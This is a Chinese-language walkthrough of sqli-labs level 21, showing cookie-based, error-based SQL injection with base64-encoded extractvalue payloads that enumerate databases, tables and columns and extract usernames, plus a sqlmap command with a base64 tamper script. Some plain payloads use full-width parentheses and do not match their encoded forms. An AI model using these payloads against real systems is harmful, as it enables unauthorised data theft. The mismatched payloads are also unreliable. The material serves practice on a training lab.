sqli-labs21关基于cookie报错注入（base64转码）

第21关基于cookie报错注入

其实测试语句和20关差不多，但是需要转码，转成base64再带入到cookie中，然后（base64在bp中有模块）
一、判断注入点
没转码之前

' )and extractvalue(1,concat(0x7e,( 1),0x7e))#

JyApYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLCggMSksMHg3ZSkpIyA=

（这里的思想是先不用闭合点，进行转码，一点一点试出来，然后报错出1的话，就是闭合点）
二、爆库

' ）and extractvalue(1,concat(0x7e,(database()),0x7e)))#   

JyAJYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSwweDdlKSkpIyA=

' ）and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)))#   

JyAJYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3Qgc2NoZW1hX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEgbGltaXQgMCwxKSwweDdlKSkpIyAgIA==

三、爆表

' ）and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e)))#

JyAJYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgbGltaXQgMywxKSwweDdlKSkpIw==

四、爆字段

' ）and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e)))#

JyAJYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgY29sdW1uX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycgbGltaXQgMiwxKSwweDdlKSkpIw==

五、爆数据

' ）and extractvalue(1,concat(0x7e,(select username from users limit 2,1),0x7e)))#

JyAJYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgdXNlcm5hbWUgZnJvbSB1c2VycyBsaW1pdCAyLDEpLDB4N2UpKSkj

python2 sqlmap.py -r 1.txt --cookie uname=YWRtaW4%3D --tech E --dbms mysql --tamper base64encode.py --batch -v 0